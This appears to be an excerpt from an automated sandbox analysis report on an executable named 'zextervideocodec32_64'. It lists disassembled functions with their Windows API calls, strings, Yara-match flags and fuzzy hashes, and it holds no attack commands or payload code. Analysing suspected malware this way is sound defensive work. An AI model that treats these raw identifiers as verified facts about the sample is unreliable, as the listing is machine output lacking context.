                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2725315915-0
                                                                                                      • Opcode ID: b415c222c890962fd3b9f960514aa40bceb996725e74948e3888f758bd677a48
                                                                                                      • Instruction ID: 21a301c1e70ff7d413f6dff43684362fc848972c0551406c78a4b585c2b79240
                                                                                                      • Opcode Fuzzy Hash: b415c222c890962fd3b9f960514aa40bceb996725e74948e3888f758bd677a48
                                                                                                      • Instruction Fuzzy Hash: BE018676A40205AFDF10EBA4DC89F8AB7BDEB04369F104958F625DB190DB60E9449B10
                                                                                                      Function 02BC2420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 747265849-0
                                                                                                      • Opcode ID: b3c882eff7febc32f64d6e9a1f0f06b795f7ba390f83c6bc407dd49e0e0dac49
                                                                                                      • Instruction ID: 0e89ef1cd546f2b90ea171935eb87eadc731c579a428668bf462fade831762ac
                                                                                                      • Opcode Fuzzy Hash: b3c882eff7febc32f64d6e9a1f0f06b795f7ba390f83c6bc407dd49e0e0dac49
                                                                                                      • Instruction Fuzzy Hash: 58F03072640205BBDB109AA0ED49FD6B72CFB44751F904455F701DB481DB71AA21DBA1
                                                                                                      Function 02BC1EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02BC1ED2
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02BC1EEA
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC1EF9
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC1F0E
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC1F15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 830998967-0
                                                                                                      • Opcode ID: a37bd0682b8817fc7773a6be6c26841c4ebe206b6672563458e70861df633b5f
                                                                                                      • Instruction ID: f878844eb9d962ceaf8868d3f561576c17758c7cf092c439618fe2992e6eb0d4
                                                                                                      • Opcode Fuzzy Hash: a37bd0682b8817fc7773a6be6c26841c4ebe206b6672563458e70861df633b5f
                                                                                                      • Instruction Fuzzy Hash: DCF03A72641605FBDB00AFA5ED88FD6BB2DFF48391F000416F6019B442DB71AA25DBE0
                                                                                                      Function 02BC8725 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memmove
                                                                                                      • String ID: invalid string position$string too long
                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                      • Opcode ID: 02d52752bcf22325dcd0420dc0fe718f3c24d51bada9543bdc54c63434ff0002
                                                                                                      • Instruction ID: 1707fd5ff5a809d915dfe1d6b6248b5a91275c3342642d0aa60ab9a14d096e91
                                                                                                      • Opcode Fuzzy Hash: 02d52752bcf22325dcd0420dc0fe718f3c24d51bada9543bdc54c63434ff0002
                                                                                                      • Instruction Fuzzy Hash: 2D41B5313003049BD7359E69DC94E66BBAAEF40754B2009BEE956CB781DB70F944CB91
                                                                                                      Function 02BC30AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02BC30C3
                                                                                                      • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02BC3102
                                                                                                      • _memcmp.LIBCMT ref: 02BC3141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLastString_memcmp
                                                                                                      • String ID: 255.255.255.255
                                                                                                      • API String ID: 1618111833-2422070025
                                                                                                      • Opcode ID: 6031fec98fc083101f0a3116bfd565b81b7ec5261d101576bdc73673703bc0b8
                                                                                                      • Instruction ID: 9ed4f49ceae60202d85d6d5b4999d22cf59500d5ab123bd0665676c99d02c725
                                                                                                      • Opcode Fuzzy Hash: 6031fec98fc083101f0a3116bfd565b81b7ec5261d101576bdc73673703bc0b8
                                                                                                      • Instruction Fuzzy Hash: 4731B571A003559FDB20AF64C880BAEB7E5EF45324F6089EDED655B380EB719981CF90
                                                                                                      Function 02BCCC85 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCCC8A
                                                                                                        • Part of subcall function 02BCD266: std::exception::exception.LIBCMT ref: 02BCD295
                                                                                                        • Part of subcall function 02BCDA1C: __EH_prolog.LIBCMT ref: 02BCDA21
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                        • Part of subcall function 02BCD2C5: __EH_prolog.LIBCMT ref: 02BCD2CA
                                                                                                      Strings
                                                                                                      • @P~, xrefs: 02BCCCB6, 02BCCD46
                                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02BCCCC0
                                                                                                      • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCCCC7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                      • String ID: @P~$C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                      • API String ID: 1953324306-4153709165
                                                                                                      • Opcode ID: a4dbe3905cbc7fef157ec03e21e57ff0515e1360088a09037fe8ba67f25f135b
                                                                                                      • Instruction ID: e140d3b4a8363c51d56026f3d8c3b10e18a30960256c7a994b5ed56d9849ccfb
                                                                                                      • Opcode Fuzzy Hash: a4dbe3905cbc7fef157ec03e21e57ff0515e1360088a09037fe8ba67f25f135b
                                                                                                      • Instruction Fuzzy Hash: E221AD71E002489AEB04EFA8D854AEDBFB5EF14300F1444DDE946AB280DB709A44CF51
                                                                                                      Function 02BCCD7A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BCCD7F
                                                                                                        • Part of subcall function 02BCD33D: std::exception::exception.LIBCMT ref: 02BCD36A
                                                                                                        • Part of subcall function 02BCDB53: __EH_prolog.LIBCMT ref: 02BCDB58
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                        • Part of subcall function 02BCD39A: __EH_prolog.LIBCMT ref: 02BCD39F
                                                                                                      Strings
                                                                                                      • P~, xrefs: 02BCCDAB, 02BCCE3B
                                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02BCCDB5
                                                                                                      • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02BCCDBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                      • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)$P~
                                                                                                      • API String ID: 1953324306-3742533756
                                                                                                      • Opcode ID: 5634b7a20db9ab919b449d280acdfe23a58f88c1a5957ac71bf4616ba8a3572a
                                                                                                      • Instruction ID: cdf161ebc03c13b03be6c1e50cda60897533caea2389a6f89a8db20350744c8e
                                                                                                      • Opcode Fuzzy Hash: 5634b7a20db9ab919b449d280acdfe23a58f88c1a5957ac71bf4616ba8a3572a
                                                                                                      • Instruction Fuzzy Hash: 4921CCB5E002089BDB08EFA8D550BEEBBB5EF55300F2045DDE906AB240DB706A44CF91
                                                                                                      Function 02BC1F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC1F5B
                                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02BC1FC5
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 02BC1FD2
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                                      • String ID: iocp
                                                                                                      • API String ID: 998023749-976528080
                                                                                                      • Opcode ID: 2827cf37d741ef62fbaf0c25e3eb94c4dbc094678fbd580222b7a14c667a55a4
                                                                                                      • Instruction ID: c3cb22a90284a2a88115a85a7b189832337245e4cac91597385aa7ead715bba6
                                                                                                      • Opcode Fuzzy Hash: 2827cf37d741ef62fbaf0c25e3eb94c4dbc094678fbd580222b7a14c667a55a4
                                                                                                      • Instruction Fuzzy Hash: A021A2B1901B449FCB20DF6AC54455AFBF8EF94720B108A5FA4A697A50D7B0A6048F91
                                                                                                      Function 02BD3B2C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 02BD3B44
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • std::exception::exception.LIBCMT ref: 02BD3B62
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BD3B77
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 3074076210-2104205924
                                                                                                      • Opcode ID: adc30761eee1b9f988c47acb1072f7fd940e6bedd3ff5d64096d6db6e05f8906
                                                                                                      • Instruction ID: 16f09aedd8cce784b87d198af6ba4d4f551e97fcad209423b3402fe998542b3f
                                                                                                      • Opcode Fuzzy Hash: adc30761eee1b9f988c47acb1072f7fd940e6bedd3ff5d64096d6db6e05f8906
                                                                                                      • Instruction Fuzzy Hash: 15E0657190020EA7DF04FE54DC059EFBBBAAB00304F4045E5ED15A6592FB719A45CEE1
                                                                                                      Function 02BC37B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC37B6
                                                                                                      • __localtime64.LIBCMT ref: 02BC37C1
                                                                                                        • Part of subcall function 02BD25E0: __gmtime64_s.LIBCMT ref: 02BD25F3
                                                                                                      • std::exception::exception.LIBCMT ref: 02BC37D9
                                                                                                        • Part of subcall function 02BD24B3: std::exception::_Copy_str.LIBCMT ref: 02BD24CC
                                                                                                        • Part of subcall function 02BCA4FE: __EH_prolog.LIBCMT ref: 02BCA503
                                                                                                        • Part of subcall function 02BCA4FE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA512
                                                                                                        • Part of subcall function 02BCA4FE: __CxxThrowException@8.LIBCMT ref: 02BCA531
                                                                                                      Strings
                                                                                                      • could not convert calendar time to UTC time, xrefs: 02BC37CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                      • String ID: could not convert calendar time to UTC time
                                                                                                      • API String ID: 1963798777-2088861013
                                                                                                      • Opcode ID: c06b1d172bc190811da965a4d6811b57394a451131698e2417bcd28ac8f913b8
                                                                                                      • Instruction ID: 408f361aee19042865537691ed4821a34b42bac651cecf8ec32d46123156859c
                                                                                                      • Opcode Fuzzy Hash: c06b1d172bc190811da965a4d6811b57394a451131698e2417bcd28ac8f913b8
                                                                                                      • Instruction Fuzzy Hash: 77E06DB2D0020A9BCF10EFA4D915BEEB779FB04304F5085DADC12A2641EB7956058F84
                                                                                                      Function 0040315A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00402E6A), ref: 0040315F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040316F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                      • Opcode ID: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                                                                      • Instruction ID: 396ae008ee37b43aaac66eedf252cb0d6854bca9fd0baad0eaa83bc1c4717f20
                                                                                                      • Opcode Fuzzy Hash: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                                                                      • Instruction Fuzzy Hash: 14C01270380B00A6EA201FB20F0AB2628AC1B48B03F1800BEA289F81C0CE7CC600843D
                                                                                                      Function 00404C1C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040403A), ref: 00404C3D
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040403A), ref: 00404C61
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040403A), ref: 00404C7B
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040403A), ref: 00404D3C
                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040403A), ref: 00404D53
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 714016831-0
                                                                                                      • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                                      • Instruction ID: 583ec5426b209604bff2a02b3d2478297b9ba55a468d27544d52312baf66a8bd
                                                                                                      • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                                      • Instruction Fuzzy Hash: BC31E2B15417019BE3348F24EE44B22B7A0EBC8754F11863AE665B73E1EB78A844CB5C
                                                                                                      Function 0040443E Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 00404696
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004046F1
                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00404703
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$Virtual$Heap
                                                                                                      • String ID: 4/@
                                                                                                      • API String ID: 2016334554-3101945251
                                                                                                      • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                                      • Instruction ID: 876bcf6037267374920b0e9be09a40bf20dde446c7cba65ee9efa19dd1b870bf
                                                                                                      • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                                      • Instruction Fuzzy Hash: 4AB18EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                                                                      Function 02BDC3C9 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer_memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721217611-0
                                                                                                      • Opcode ID: e1ec462f8f033f190c974fbc3ecb50856aa62cece8a81ce4f2cd8e1762940242
                                                                                                      • Instruction ID: 7f358e5461e14437812d11ba1c6c2a3c5f639988eef1c91520d087c1bcc3c783
                                                                                                      • Opcode Fuzzy Hash: e1ec462f8f033f190c974fbc3ecb50856aa62cece8a81ce4f2cd8e1762940242
                                                                                                      • Instruction Fuzzy Hash: 8E4163752543035AEF299E25E841BFA3BE5DF01B68F28409EE946861D2FB75E580CF10
                                                                                                      Function 02BD1300 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD139F
                                                                                                        • Part of subcall function 02BC3FDC: __EH_prolog.LIBCMT ref: 02BC3FE1
                                                                                                        • Part of subcall function 02BC3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02BC3FF3
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD1394
                                                                                                      • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD13E0
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD14B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$Event$CreateH_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 2825413587-0
                                                                                                      • Opcode ID: 611199129250b833dac197de790cdc28ab174846c99aa9544188ad92a1cba235
                                                                                                      • Instruction ID: 7b1b33e1deae015e5d3a5283803aec891075775d87d7cc08ed4b3508fd5237d5
                                                                                                      • Opcode Fuzzy Hash: 611199129250b833dac197de790cdc28ab174846c99aa9544188ad92a1cba235
                                                                                                      • Instruction Fuzzy Hash: 0E51D1B16007059BDF11DF28C8847DA77E4EF48328F1986A8F86D97290E735E805CF91
                                                                                                      Function 02BD378D Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 2782032738-0
                                                                                                      • Opcode ID: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
                                                                                                      • Instruction ID: 92484beb8973157d9db574d0b0fbfe36cbcaf803be124a5531f849c94ea2d951
                                                                                                      • Opcode Fuzzy Hash: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
                                                                                                      • Instruction Fuzzy Hash: 3F41C475B00A06AFDB189EA9C8909EE77E6EF40364B1481FDE409C7281F772E9418F52
                                                                                                      Function 02BDFEF5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BDFF2B
                                                                                                      • __isleadbyte_l.LIBCMT ref: 02BDFF59
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02BDFF87
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02BDFFBD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                      • String ID:
                                                                                                      • API String ID: 3058430110-0
                                                                                                      • Opcode ID: 784c4c26a0dbe00eaf8b22f07f2f59127ee1e1aa6033944eda7fa483f41a47ca
                                                                                                      • Instruction ID: 20355d142ffbb1bd7b921e1b4e573a96658dc7c63c09b780c9739049d820a19c
                                                                                                      • Opcode Fuzzy Hash: 784c4c26a0dbe00eaf8b22f07f2f59127ee1e1aa6033944eda7fa483f41a47ca
                                                                                                      • Instruction Fuzzy Hash: 7D31B031609286AFDB218E75CC44BFA7BAAFF42314F1544A9F86687590F730D851DB90
                                                                                                      Function 02BC3D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • htons.WS2_32(?), ref: 02BC3DA2
                                                                                                        • Part of subcall function 02BC3BD3: __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                                                        • Part of subcall function 02BC3BD3: std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                                                      • htons.WS2_32(?), ref: 02BC3DD4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                                      • String ID:
                                                                                                      • API String ID: 3882411702-0
                                                                                                      • Opcode ID: f4f735aa9c0219c3906fbd245aaa11b6ab086a6ff3e66f580ffb6bb1fbe26452
                                                                                                      • Instruction ID: 6e3cf354a433d2a440e84c846f6a8eaf1f0818e7a52613d828db29e23d1241bb
                                                                                                      • Opcode Fuzzy Hash: f4f735aa9c0219c3906fbd245aaa11b6ab086a6ff3e66f580ffb6bb1fbe26452
                                                                                                      • Instruction Fuzzy Hash: 17117C35A00309EBCF019F64D885A9AB7B9EF09310B10849AFC05DF205DA719A54DBA1
                                                                                                      Function 02BC239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02BC23D0
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC23DE
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2401
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2408
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 4018804020-0
